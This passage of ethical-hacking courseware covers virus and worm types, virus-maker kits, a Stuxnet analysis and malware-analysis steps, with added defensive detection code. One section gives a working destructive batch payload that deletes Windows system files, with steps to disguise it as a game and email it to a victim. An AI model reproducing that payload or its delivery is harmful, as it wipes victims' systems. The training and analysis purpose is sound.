Sparse infector viruses infect only occasionally (e.g., every tenth program executed, or only on a particular day of the week) or only files whose lengths fall within a narrow range. By infecting less often, these viruses try to minimize the probability of being discovered: fewer infected files means fewer chances for a user to notice misbehaviour, fewer samples for an analyst, and a spread slow enough to stay under the radar of bait files and behaviour monitors. For the defender this means that a single clean scan of a suspect machine proves little; repeated integrity checks over time are what catch a sparse infector.
Companion/Camouflage Viruses

A companion virus does not modify the host executable at all. Instead it creates a companion file for each executable it "infects", with the same base name but an extension that Windows resolves first. For example, a companion virus may save itself as notepad.com next to notepad.exe (the good program). When the user starts the program by name without an extension (from the Run dialog, a command prompt or a batch file), cmd.exe tries the extensions in PATHEXT order, .COM before .EXE, so notepad.com (the virus) is loaded instead and infects the system. The virus then typically launches the real notepad.exe so that nothing looks wrong. Double-clicking notepad.exe itself in Explorer is not affected, which is why this is also called a camouflage virus: the infection is in the name, not in the file.

Figure: Notepad.exe (good program) and Notepad.com (virus). The attacker's virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory.
Shell Viruses

A shell virus's code forms a layer around the target host program's code that can be compared to an "egg shell": the virus makes itself the program that runs first and the original host code its subroutine. The original code is moved to a new location by the virus code (typically appended behind it), the virus takes over the file's entry point and so assumes the host's identity, and after the virus has run it passes control to the relocated original so that the program still appears to work. Almost all boot-sector viruses are shell viruses: they copy the original boot sector elsewhere on the disk, install themselves in its place and chain to the saved original.

Figure: before infection, the original program; after infection, virus code wrapping the original program, which now runs as its subroutine.
File Extension Viruses

Source: http://www.cknow.com/vtutor/FileExtensions.html

File extension viruses exploit the way Windows displays file names. A .TXT extension is "safe" because it indicates a pure text file. With the display of extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT; if you have forgotten that extensions are hidden, you may take it for a text file and open it. It is in fact an executable Visual Basic Script file and could do serious damage. The same trick works with any document-looking name followed by an executable extension (.EXE, .SCR, .PIF, .JS, .VBS), and it is often combined with a document icon on the executable.

The countermeasure is to turn off "Hide extensions for known file types" in Windows (Folder Options, View tab, Advanced settings), as shown in the following screenshot, and to treat any name whose real (last) extension is executable as a program regardless of what it appears to be.

Screenshot: Windows Folder Options, View tab. Under Advanced settings, "Hide extensions for known file types" is unchecked; the other listed options (Always show icons, never thumbnails; Always show menus; Display file icon on thumbnails; Display file size information in folder tips; Display the full path in the title bar; Hidden files and folders; Hide empty drives in the Computer folder; Hide folder merge conflicts) are left as they were.
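Both name-based tricks, the companion file from the Companion/Camouflage section and the double extension from this one, modelled in one added example that is not part of the CEH material: a resolver that imitates how cmd.exe picks notepad.com over notepad.exe for a bare command name, a detector for .COM/.BAT/.CMD files that shadow an .EXE, a model of Explorer's hidden-extension display, and a detector for names such as BAD.TXT.VBS. The directory listing is constructed, and the PATHEXT order used is the leading part of the Windows default.

```python
"""Companion files and deceptive double extensions, modelled for detection.

Added example, not part of the CEH material. Assumptions: a cmd.exe-style
resolver that tries the leading default PATHEXT entries (.COM, .EXE, .BAT,
.CMD) for a command typed without an extension, and Explorer's 'hide
extensions for known file types' display rule. LISTING is constructed.
"""
import os

PATHEXT = [".COM", ".EXE", ".BAT", ".CMD"]  # leading entries of the Windows default
EXECUTABLE = {".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif"}
DOCUMENT = {".txt", ".pdf", ".doc", ".docx", ".jpg", ".png"}
KNOWN_GOOD_COM = {"more", "tree", "chcp", "mode", "format"}  # real .COM tools in System32

LISTING = [  # constructed directory contents
    "notepad.exe", "notepad.com",                 # companion pair
    "calc.exe",
    "more.com",                                   # legitimate .COM, no .EXE twin
    "README.TXT", "BAD.TXT.VBS", "invoice.pdf.exe", "photo.jpg",
]


def resolve_command(name, listing):
    """What cmd.exe runs for a bare 'notepad': the first PATHEXT match."""
    lower = {f.lower(): f for f in listing}
    for ext in PATHEXT:
        hit = lower.get(name.lower() + ext.lower())
        if hit:
            return hit
    return None


def find_companions(listing):
    """Base names where a .COM/.BAT/.CMD shadows an .EXE. Legitimate .COM
    tools are allowlisted; anything else shadowing an .EXE is a candidate."""
    by_base = {}
    for f in listing:
        base, ext = os.path.splitext(f.lower())
        by_base.setdefault(base, set()).add(ext)
    return sorted(b for b, exts in by_base.items()
                  if ".exe" in exts and exts & {".com", ".bat", ".cmd"}
                  and b not in KNOWN_GOOD_COM)


def displayed_name(filename, hide_known_ext=True):
    """Explorer drops the last extension when the option is on."""
    return os.path.splitext(filename)[0] if hide_known_ext else filename


def find_deceptive_names(listing):
    """Files whose displayed name ends in a document extension while the real
    (last) extension is executable: the BAD.TXT.VBS pattern."""
    out = []
    for f in listing:
        real_ext = os.path.splitext(f)[1].lower()
        shown_ext = os.path.splitext(displayed_name(f))[1].lower()
        if real_ext in EXECUTABLE and shown_ext in DOCUMENT:
            out.append(f)
    return sorted(out)


def demo():
    return {
        "bare_notepad_runs": resolve_command("notepad", LISTING),
        "companions": find_companions(LISTING),
        "shown_as": displayed_name("BAD.TXT.VBS"),
        "deceptive": find_deceptive_names(LISTING),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Typing notepad resolves to notepad.com, the companion detector names the notepad pair and ignores more.com, and the extension detector flags both BAD.TXT.VBS and invoice.pdf.exe while leaving README.TXT and photo.jpg alone.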
Add-on and Intrusive Viruses

Add-on Viruses

Add-on viruses append their code to the host code without making any changes to the host's own instructions, or relocate the host code so that they can insert their own code at the beginning. In the appending form the virus patches the program's entry point (a JUMP into the viral code at the end of the file); once the virus has run, it jumps back and the original program executes normally, which is why the infection is usually invisible to the user. The file grows by the size of the viral code, so a length or hash comparison against a known-good copy reveals it.

FIGURE 7.18: Working of Add-on Viruses. Left: the original program. Middle: viral code appended after the original program, with a JUMP from the entry point into the viral code. Right: the original program relocated and the viral code inserted at the beginning.
Intrusive Viruses

Intrusive viruses overwrite their code onto the host, either completely replacing the target program's code or overwriting only part of it. The overwritten original code is lost, so the host no longer executes properly; the infection is therefore obvious and short-lived, and the original program can only be restored from a clean copy.

FIGURE 7.19: Working of Intrusive Viruses. The original program before infection, and the original program with part of its code overwritten by the virus after infection.
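The three layouts from the Shell, Add-on and Intrusive sections above, as one added example that is not part of the CEH material: constructed byte-string hosts infected each way, and a classifier that tells a defender holding a known-good copy which kind of modification it is looking at, and therefore whether the original can be recovered from the infected file. The host, the virus body and the four-byte entry-point patch are constructed.

```python
"""Classify a modified executable against a known-good copy: shell (prepend,
original relocated), add-on (original intact, virus appended, entry point
patched), intrusive (original bytes overwritten).

Added example, not part of the CEH material; ORIGINAL, VIRUS and the 4-byte
entry-point patch are constructed stand-ins for real code.
"""

ORIGINAL = b"MZ" + b"ORIGINAL-PROGRAM-CODE-" * 3
VIRUS = b"VIRUS-BODY-"
ENTRY_PATCH_LEN = 4  # bytes at the start an add-on virus rewrites into a jump


def shell_infect(host, virus=VIRUS):
    """Virus first, the whole original moved behind it (the 'egg shell')."""
    return virus + host


def addon_infect(host, virus=VIRUS):
    """Original left in place, virus appended, entry point redirected."""
    return b"JMP>" + host[ENTRY_PATCH_LEN:] + virus


def intrusive_infect(host, virus=VIRUS):
    """Virus written over the start of the host; those bytes are gone."""
    return virus + host[len(virus):]


def classify(clean, candidate):
    """'clean', 'shell', 'add-on', 'intrusive' or 'unknown'."""
    if candidate == clean:
        return "clean"
    n = len(clean)
    if len(candidate) > n and candidate.endswith(clean):
        return "shell"  # complete original present, shifted to the end
    if (len(candidate) > n
            and candidate[ENTRY_PATCH_LEN:n] == clean[ENTRY_PATCH_LEN:]
            and candidate[:ENTRY_PATCH_LEN] != clean[:ENTRY_PATCH_LEN]):
        return "add-on"  # original intact except the patched entry bytes
    if len(candidate) == n:
        return "intrusive"  # same length, different bytes: overwritten
    return "unknown"


def original_recoverable(kind):
    """Can the clean program be rebuilt from the infected file alone?"""
    return {"clean": True, "shell": True, "add-on": False, "intrusive": False}.get(kind, False)


def demo():
    variants = {
        "shell": shell_infect(ORIGINAL),
        "add-on": addon_infect(ORIGINAL),
        "intrusive": intrusive_infect(ORIGINAL),
        "clean": ORIGINAL,
    }
    return {name: classify(ORIGINAL, data) for name, data in variants.items()}


if __name__ == "__main__":
    for name, kind in demo().items():
        print(name, kind, "recoverable:", original_recoverable(kind))
```

A shell infection still contains the entire original, so the host can be cut out of it; an add-on infection has lost its entry bytes (the virus keeps them, but the defender cannot trust that copy); an intrusive infection has destroyed part of the program outright. In every case the decision needs a trusted baseline, which is the argument for keeping hashes of known-good binaries.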
Transient and Terminate and Stay Resident Viruses

Basic infection techniques divide viruses by how long they stay in memory.

Direct Action or Transient Viruses

A transient (direct action) virus lives only as long as its host is running. When the infected host is executed, the virus code runs first, selects one or more target programs to be modified, infects them, and then transfers control back to the host code in which it resides. Once the host terminates, the virus is gone from memory until an infected program is run again; it does not install itself as a resident component.

Terminate and Stay Resident Viruses (TSR)

TSR viruses remain permanently in memory during the entire work session, even after the target host program is executed and terminated, where they can hook system services and infect further programs as they are run. They can only be removed from memory by rebooting the system, and they come back on the next boot unless the infected files that reload them are cleaned as well.
Writing a Simple Virus Program

For demonstration purposes, a simple program that can be used to cause harm to a target system is shown here. Strictly speaking it is not a virus, since it does not replicate; it is a destructive batch payload dressed up as a game.

1. Create a batch file Game.bat with the following text:

    @echo off
    del c:\winnt\system32\*.*
    del c:\winnt\*.*

2. Convert the Game.bat batch file to Game.com using the bat2com utility.

3. Assign an icon to Game.com using the Windows file properties screen.

4. Send the Game.com file as an email attachment to a victim.

5. When the victim runs this program, it deletes core files in the \WINNT directory, making Windows unusable. The victim would have to reinstall Windows, with the attendant risk to already saved files.

The paths assume a Windows NT/2000-era installation in C:\WINNT; on later versions the system directory is C:\Windows, and the protected system files there are not deletable by a standard user account.
TeraBIT Virus Maker

TeraBIT Virus Maker is a virus construction kit: the user ticks the payloads to include, gives the output a file name and clicks Create Virus, and the tool builds an executable. The executables it produces are detected by practically every antivirus product. Most of the available payloads are nuisances (mouse and keyboard pranks, hiding the taskbar, beeping, opening the CD-ROM tray), but some are genuinely destructive (Format All Hard Drives, Delete All Files In My Documents, Delete Windows Fonts), and several disable the machine's defences (Disable Windows Firewall, Disable Windows Security Center, Disable Windows Security Essentials, Disable Task Manager, Disable Regedit, Disable System Restore, Disable Automatic Updates) so that another piece of malware can run unhindered.

Screenshot: TeraBIT Virus Maker payload options, including: Avoid Opening Calculator, Copy/Move Window, Gpedit, Media Player, Mozilla Firefox, MsConfig, Notepad, Wordpad, Yahoo Messenger; Add 30 User Accounts to Windows; Always Clean Clipboard; Always Log Off; Close Internet Explorer Every 10 Sec; Delete All Files In Desktop; Delete All Files In My Documents; Delete Windows Fonts; Delete Windows Screen Savers; Disconnect From Internet; Disable Automatic Updates, Command Prompt, Printer, Regedit, Screen Saver, System Restore, Task Manager, Windows Firewall, Windows Installer, Windows Security Center, Windows Security Essentials, Windows Themes; Format All Hard Drives; Funny Keyboard, Funny Mouse, Funny Start Button; Gradually Fill System Volume; Hide Desktop Icons, Hide Folder Option Menu, Hide Taskbar; Lock All Drives/Folders; Lock Internet Explorer Option Menu; Mute System Volume; Open/Close CD-ROM Every 10 Sec; Play Beep Sound Every Sec; Remove Desktop Wallpaper, Remove Run From Start Menu, Remove Start Button, Remove Windows Clock; Slow Down PC Speed; Spread with Floppy, Folders; Stop SQL Server; Swap Mouse Buttons; Transparent Explorer Windows; Turn off Computer After 5 Min; Turn Off Monitor; Run Custom Command; File Name; Create Virus.
JPS Virus Maker and Batch Virus Maker

JPS Virus Maker 3.0 is another point-and-click construction kit of the same kind: the builder picks payloads from check boxes, chooses what the result does after it runs (Log Off, Restart, Turn Off, Hibernate or None), optionally enables Auto Startup, and can point the output at a server name.

DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice

Screenshots: JPS Virus Maker 3.0 and DELmE's Batch Virus Maker option panels. Recoverable options include: Disable Registry, MsConfig, Task Manager, Yahoo, Media Player, Internet Explorer, Time, Group Policy, Windows Explorer, Norton Anti Virus, McAfee Anti Virus, Notepad, WordPad, DHCP Client, Taskbar, Start Button, MSN Messenger, CMD, Security Center, System Restore, Control Panel, Desktop Icons, Screen Saver; Hide Services, Outlook Express, Windows Clock, Desktop Icons, All Processes in Taskmgr, All Tasks in Taskmgr, Run, Cursor; Change Explorer Caption; Swap Mouse Buttons; Remove Folder Options; Lock Mouse & Keyboard; Mute Sound; Always CD-ROM; Turn Off Monitor; Crazy Mouse; Destroy Taskbar, Destroy Protected Storage, Destroy Audio Service, Destroy Clipboard; Terminate Windows; Auto Startup; Spam Local Disk; Net Send Spam; Change User Password; Open/Close Disk Tray; Spam Printer; Delete All Xml/Mp3/Png/Exe/Dll Files; Delete My Music, My Documents, My Pictures; Fork Bomb; Log Off; Restart; Turn Off; Hibernate; None; Server Name; Create.
Module Flow

Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

Prior to this, we have discussed various types of viruses. Now we will discuss computer worms and how they are different from viruses. This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm Maker Thing).
Computer Worms

Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources (bandwidth, CPU time, mail queues); however, some worms carry a payload to damage the host system. A worm does not require a host file to replicate, although one may argue that a worm's host is the machine it has infected. Worms are often classified as a subtype of virus, that is, as self-replicating malware, distinguished by the fact that they spread as standalone programs rather than by attaching themselves to other files. Worms were once considered mainly a mainframe problem, but once most of the world's systems were interconnected they were targeted at the Windows operating system and spread through email, IRC, file shares and other network functions. Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet; these botnets can be used to carry out further cyber-attacks such as spam campaigns and distributed denial of service.
How Is a Worm Different from a Virus?

TABLE 7.1: Difference between Virus and Worms

Spreading. Virus: a virus cannot spread to another computer unless an infected file is copied and actually sent to that computer; it only infects files on the machine it is on, so its spreading options are far fewer than a worm's. Worm: once running on a system, a worm replicates itself and spreads on its own, using IRC, Outlook or other mail programs, network shares and vulnerable services; it has many more spreading options than a virus.

Effect on files. Virus: files such as .com, .exe or .sys, or a combination of them, are corrupted once the virus runs on the system. Worm: a worm typically does not modify any stored programs; it ships as its own executable.

Removal. Virus: because a virus lives inside many infected files, it is a lot harder to get off an infected machine; every host file must be found and cleaned. Worm: compared to a virus, a worm is easy to remove from the system: stop the process, delete its files and its persistence entry, and close the hole it came in through.
Worm Analysis: Stuxnet

Source: http://www.symantec.com

Stuxnet is a threat targeting a specific industrial control system, likely in Iran, such as a gas pipeline or power plant. Its goal is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely outside their specified boundaries. Stuxnet is a complex threat with diverse modules and functionalities. It is used to take control of and reprogram industrial control systems (ICS) by modifying code on the PLCs, which gives the attacker a way into the complete system: the code changes take unauthorized control of the physical process without the knowledge of the operators, from whom the modified PLC code is also hidden.

Stuxnet's features, as documented by Symantec:

1. Self-replicates through removable drives, exploiting a vulnerability that allows auto-execution (the Windows shortcut/LNK vulnerability, MS10-046).
2. Spreads in a LAN through a vulnerability in the Windows Print Spooler (MS10-061).
3. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067).
4. Copies and executes itself on remote computers through network shares.
5. Copies and executes itself on remote computers running a WinCC database server.
6. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded.
7. Updates itself through a peer-to-peer mechanism within a LAN.
8. Exploits a total of four unpatched Microsoft vulnerabilities (two used for self-replication, two for privilege escalation).
9. Contacts a command and control server that allows the attacker to download and execute code, including updated versions.
10. Contains a Windows rootkit that hides its binaries and attempts to bypass security products.
11. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system.
Worm Analysis: Stuxnet (Cont'd)

Source: http://www.symantec.com

Stuxnet consists of a large .dll file that contains many different exports and resources, and two encrypted configuration blocks. The dropper component of Stuxnet is a wrapper program that contains all of the above components stored inside itself in a section named "stub". When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into yet another currently running process. To load the DLL it uses a special method designed to bypass behaviour blocking and host intrusion-protection technologies that monitor LoadLibrary calls: it hooks Ntdll.dll to watch for requests to load specially crafted file names, and maps those file names to another location instead, a location in memory specified by W32.Stuxnet, so the DLL never has to exist on disk under a name that a monitor could flag.
Worm Analysis: Stuxnet (Cont'd)

Source: http://www.symantec.com

Infection Routine Flow

[Figure: infection routine flow diagram. Check CFG -> create global mutexes -> set file times -> decrypt resources 201 and 242 and write the rootkit files (Mrxnet.sys, Mrxcls.sys) to disk -> create .pnf and .cfg files -> compare the running version number with the version on disk; if the version is OK and the date is before 06/24/2012, decrypt and load self from disk and call export 6 (get version), then inject into Step 7 and call export 32 (infects Step 7 projects); otherwise exit. The rootkit hides the malicious files.]
Stuxnet checks whether it has administrator rights on the computer. It wants to run with the highest privilege possible so that it is permitted to take whatever actions it likes on the computer. If it does not have administrator rights, it runs one of the two zero-day escalation of privilege attacks described below. If the process already has the rights it needs, it prepares to call export 16 in the main .dll file; it calls export 16 using the injection techniques described in the Injection Technique section. When the process does not have administrator rights, it tries to gain them with one of two zero-day escalation of privilege exploits, chosen according to the operating system of the compromised computer. On Windows Vista, Windows 7, or Windows Server 2008 R2, the Task Scheduler escalation of privilege vulnerability (undisclosed at the time of writing) is exploited. On Windows XP, the win32k.sys escalation of privilege vulnerability (likewise undisclosed at the time) is exploited.
If exploited, either vulnerability results in the main .dll file running as a new process: inside the csrss.exe process in the case of the win32k.sys vulnerability, or as a new task with administrator rights in the case of the Task Scheduler vulnerability. The code that exploits the win32k.sys vulnerability is stored in resource 250. Details of the win32k.sys and Task Scheduler vulnerabilities were not released at the time because patches were not yet available.

After export 15 completes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version number on the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step 7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate between the different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid, then checks the value "NTVDM TRACE" in the following registry key (the flow diagram shows this value being compared with 19790529, which serves as a "do not infect" marker):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation
Infection Routine Flow (Cont'd)

[Figure: continuation of the infection routine flow. Check CFG (error -> exit) -> registry value NTVDM TRACE = 19790529 (equal -> exit) -> create global mutexes -> date check against the 06/24/2012 deadline (past deadline -> exit) -> check OS (XP or earlier / Vista or later) -> set SACL or DACL accordingly -> create .pnf and .cfg files (Oem7a.pnf, rootkit files) -> decrypt and load self from disk, call export 6 (get version).]
Worm Maker: Internet Worm Maker Thing

[Screenshot: Internet Worm Maker Thing Version 4.00: Public Edition. The window shows check-box panels for payload options (disable security tools, Blue Screen of Death, disable shutdown, loop sound, hide desktop, disable malware removal, disable Windows File Protection, corrupt antivirus, change computer name, change wallpaper, add to favorites), infection options (infect .bat files), spreading and startup options, icon, owner, URL, and output path, plus a "Compile to EXE" option.]
Internet Worm Maker Thing is a tool specifically designed for generating worms. The generated worms are configured in advance with a payload and a spreading method: they reach a host over the network, infect it, and establish a base from which further attacks can be launched later. The worms operate autonomously; an Internet worm sends copies of itself to vulnerable computers across the Internet.
Module Flow

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing

Malware analysis is the process of taking a malware sample apart in order to study it. It is usually performed for several reasons: to find the vulnerabilities the malware exploits in order to spread, to determine what information it stole, and to work out the preventive measures that will keep it out of the system or network in future.

The malware analysis procedure is explained in detail in the next few slides.
What Is a Sheep Dip Computer?

Sheep dipping refers to the analysis of suspect files, incoming messages, and similar items for malware. The "sheep dipped" computer is isolated from the other computers on the network so that any virus it harbors cannot spread to them. Before the procedure is carried out, any downloaded programs are saved to external media such as CD-ROMs or floppy diskettes. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software, and connects to a network only under strictly controlled conditions. A sheep dip computer:

- Runs port and network monitors
- Runs user, group permission, and process monitors
- Runs device driver and file monitors
- Runs registry and kernel monitors
Anti-Virus Sensor Systems

An anti-virus sensor system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. Such systems are used along with sheep dip computers.

[Figure: Network Anti-Virus System. Traffic from the Internet passes through the anti-virus system (anti-virus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, email scanner) before reaching System 1, System 2 and System 3; clean traffic is labelled "Allowed Traffic" and blocked traffic is labelled "Reflected Traffic".]

An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware and anti-phishing components, an email scanner, and so on. It is usually placed between the internal network and the Internet. It allows only legitimate traffic to flow into the network and blocks malicious traffic from entering, which improves the security of the network.
Malware Analysis Procedure: Preparing Testbed

Malware analysis provides an in-depth understanding of each individual sample and identifies emerging technical trends across large collections of malware samples. Most samples are Windows binary executables. Malware analysis is conducted with a variety of goals. The procedure for preparing the testbed is:

1. Install VMware or Virtual PC on the system
2. Install the guest OS into Virtual PC / VMware
3. Isolate the system from the network by ensuring that the NIC is in "host only" mode
4. Disable the shared folders and the guest isolation features
5. Copy the malware over to the guest OS
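Steps 3 and 4 are normally clicked through in the VMware GUI; the same isolation can be fixed in the guest's .vmx file so that it survives rebuilds and can be reviewed. The settings below are an added example, not part of the courseware or of any VMware documentation shipped with it: the keys are VMware's documented per-VM settings, while the adapter index (ethernet0) is an assumption for illustration.

```ini
# Added example: analysis-guest isolation in a VMware .vmx file.
# Keys are VMware's documented per-VM settings; "ethernet0" is the assumed adapter index.

# Step 3: host-only networking. The guest can talk to the host's virtual adapter
# but not to the LAN or the Internet.
ethernet0.present = "TRUE"
ethernet0.connectionType = "hostonly"

# Step 4: no shared folders (HGFS), and no copy/paste or drag-and-drop across the
# guest boundary, so the sample has no file path back to the host.
isolation.tools.hgfs.disable = "TRUE"
sharedFolder.maxNum = "0"
isolation.tools.copy.disable = "TRUE"
isolation.tools.paste.disable = "TRUE"
isolation.tools.dnd.disable = "TRUE"
isolation.tools.setGUIOptions.enable = "FALSE"
```

Take a snapshot of the guest before step 5 so every run can be reverted to the same clean state. Note that "host only" still exposes the host's virtual adapter to the guest: the host should not be running listening services on that interface, and a sniffer on the host-only adapter is the right place to capture whatever the sample tries to send in step 5 of the procedure.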
Malware Analysis Procedure

Step 1: Perform static analysis while the malware is inactive (not running).
Step 2: Collect information about:

- String values found in the binary, with the help of string extraction tools such as BinText
- The packing and compression technique used, with the help of compression and decompression tools such as UPX

BinText

Source: http://www.mcafee.com

BinText can extract text from any kind of file. It finds plain ASCII text, Unicode (double-byte ANSI) text, and resource strings, and in the optional "advanced" view mode it shows useful information for each item.

[Screenshot: BinText 3.0.3 scanning setup.exe (time taken: 0.109 secs). Each string is listed with its file position and memory position; the extracted strings include "!This program cannot be run in DOS mode", the section names .text, .data, .rsrc and .reloc, the import IsProcessorFeaturePresent from KERNEL32, and configuration names such as General.AppName, FilesToDelete, FilesToKeep, LoggingFlags and ReportingFlags. Summary: ANSI strings 1840, Unicode strings 373, resource strings 0.]

UPX

Source: http://upx.sourceforge.net

UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip. Running upx.exe without arguments prints its usage:

    Ultimate Packer for eXecutables
    Copyright (C) 1996 - 2011
    UPX 3.08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

    Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

    Commands:
      -1     compress faster                   -9    compress better
      -d     decompress                        -l    list compressed file
      -t     test compressed file              -V    display version number
      -h     give more help                    -L    display software license
    Options:
      -q     be quiet                          -v    be verbose
      -oFILE write output to 'FILE'
      -f     force compression of suspicious files
      -k     keep backup files
    file..  executables to (de)compress

    Type 'upx --help' for more detailed help.
    UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
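What BinText and a UPX check actually do can be reproduced in a few dozen lines, which is useful when a sample has to be triaged on a machine where neither tool is installed. The block below is an added example, not code from the courseware, from BinText or from UPX: it extracts ASCII and UTF-16LE strings the way BinText does, parses the PE section table, and reports the usual packing indicators (UPX0/UPX1 section names, the "UPX!" marker, and sections whose byte entropy is above 7 bits). The input is a constructed byte blob with valid DOS/PE headers and a pseudo-random body standing in for a packed file; it is not a real executable, and "setup.exe" in the comment is only the name used in the screenshot above.

```python
"""Added example: BinText-style string extraction plus UPX/packer indicators read from the
PE section table. The input is a constructed stand-in for a packed EXE, not a real program."""
import hashlib
import math
import re
import struct
from collections import Counter


def extract_strings(data, min_len=4):
    """Return (ascii_strings, utf16le_strings) of at least min_len characters."""
    ascii_re = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    wide_re = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    ascii_strs = [m.group().decode('ascii') for m in ascii_re.finditer(data)]
    wide_strs = [m.group().decode('utf-16le') for m in wide_re.finditer(data)]
    return ascii_strs, wide_strs


def pe_sections(data):
    """Parse the PE section table into (name, virtual_size, virtual_addr, raw_size, raw_ptr)."""
    if data[:2] != b'MZ':
        raise ValueError('not a DOS/PE image')
    pe_off = struct.unpack_from('<I', data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    n_sections = struct.unpack_from('<H', data, pe_off + 6)[0]
    opt_size = struct.unpack_from('<H', data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size                            # table follows the optional header
    sections = []
    for i in range(n_sections):
        entry = data[table + 40 * i:table + 40 * (i + 1)]
        name = entry[:8].rstrip(b'\0').decode('ascii', 'replace')
        vsize, vaddr, rsize, rptr = struct.unpack_from('<IIII', entry, 8)
        sections.append((name, vsize, vaddr, rsize, rptr))
    return sections


def shannon_entropy(buf):
    """Bits per byte: packed or encrypted data sits close to 8, plain x86 code around 5-6."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def packer_indicators(data, entropy_threshold=7.0):
    """Report the classic UPX tells and any section whose raw bytes look packed."""
    sections = pe_sections(data)
    high = [name for name, _vs, _va, rsize, rptr in sections
            if rsize and shannon_entropy(data[rptr:rptr + rsize]) > entropy_threshold]
    return {
        'sections': [s[0] for s in sections],
        'upx_names': any(s[0].upper().startswith('UPX') for s in sections),
        'upx_marker': b'UPX!' in data,
        'high_entropy': high,
    }


def build_constructed_sample():
    """Constructed bytes: valid DOS/PE headers, UPX0/UPX1 sections and a pseudo-random
    'packed' body. Not an executable; it only exercises the parsers above."""
    hdr = bytearray(0x80)
    hdr[0:2] = b'MZ'
    struct.pack_into('<I', hdr, 0x3C, 0x80)                  # e_lfanew -> PE header at 0x80
    stub = b'This program cannot be run in DOS mode.\r\n$'
    hdr[0x40:0x40 + len(stub)] = stub
    coff = b'PE\0\0' + struct.pack('<HHIIIHH', 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack('<H', 0x10B) + bytes(0xE0 - 2)         # PE32 optional header, zeroed

    def sec(name, vsize, vaddr, rsize, rptr, flags):
        return struct.pack('<8sIIIIIIHHI', name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, flags)

    image = bytes(hdr) + coff + opt
    image += sec(b'UPX0', 0x10000, 0x1000, 0, 0, 0xE0000080)  # empty section the stub unpacks into
    image += sec(b'UPX1', 0x2000, 0x11000, 0x1000, 0x200, 0xE0000040)
    image += 'LoadLibraryW'.encode('utf-16le')                # a wide string for the extractor
    image += bytes(0x200 - len(image))
    body, seed = b'', b'constructed sample'
    while len(body) < 0x1000:                                 # deterministic high-entropy filler
        seed = hashlib.sha256(seed).digest()
        body += seed
    body = bytearray(body[:0x1000])
    body[0:4] = b'UPX!'
    return image + bytes(body)


if __name__ == '__main__':
    sample = build_constructed_sample()                       # stand-in for a file such as setup.exe
    ascii_strs, wide_strs = extract_strings(sample)
    print(ascii_strs[:3], wide_strs[:1])
    print(packer_indicators(sample))
```

A sample packed with stock UPX can simply be unpacked with `upx -d` and the strings re-extracted; a modified UPX header or a different packer shows up here as high-entropy sections without the UPX names, which is the signal that the static strings are not to be trusted and the sample has to go on to the dynamic steps that follow.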
Malware Analysis Procedure (Cont'd)

Step 3: Set up the network connection and check that it is not giving any errors.
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer.

Process Monitor

Source: http://technet.microsoft.com

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.

[Screenshot: Process Monitor event list with the columns Time of Day, Process Name, PID, Operation, Path, Result and Detail. It shows Explorer.EXE (PID 2384) CreateFileMapping and CloseFile events on C:\Windows\System32\imageres.dll and a CreateFile under C:\Users\Administrator\AppData\Local\..., mmc.exe (PID 4100) ReadFile events on files under C:\Windows\Microsoft.NET\Framework\..., and firefox.exe (PID 2760) TCP Receive and TCP Send events between WIN-MSSELCK4K41:1056/1055 and a remote host; every event has the result SUCCESS.]
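Process Monitor can save its event list as CSV with the same seven columns shown above, and that export is what an analyst usually works from after the run. The block below is an added example, not part of the courseware or of Process Monitor: it reads such an export and flags the behaviours that matter most in step 4 (files written to drop locations, autorun registry values, child processes, and network connections), then groups the findings per process so that the benign noise from Explorer and mmc.exe drops out. The CSV embedded in it is constructed for the example; the process names, PIDs, paths and the 203.0.113.7 address are made up.

```python
"""Added example: triage of a Process Monitor CSV export (step 4). The CSV is constructed;
processes, PIDs, paths and the 203.0.113.7 address are made up for the example."""
import csv
import io
import re
from collections import defaultdict

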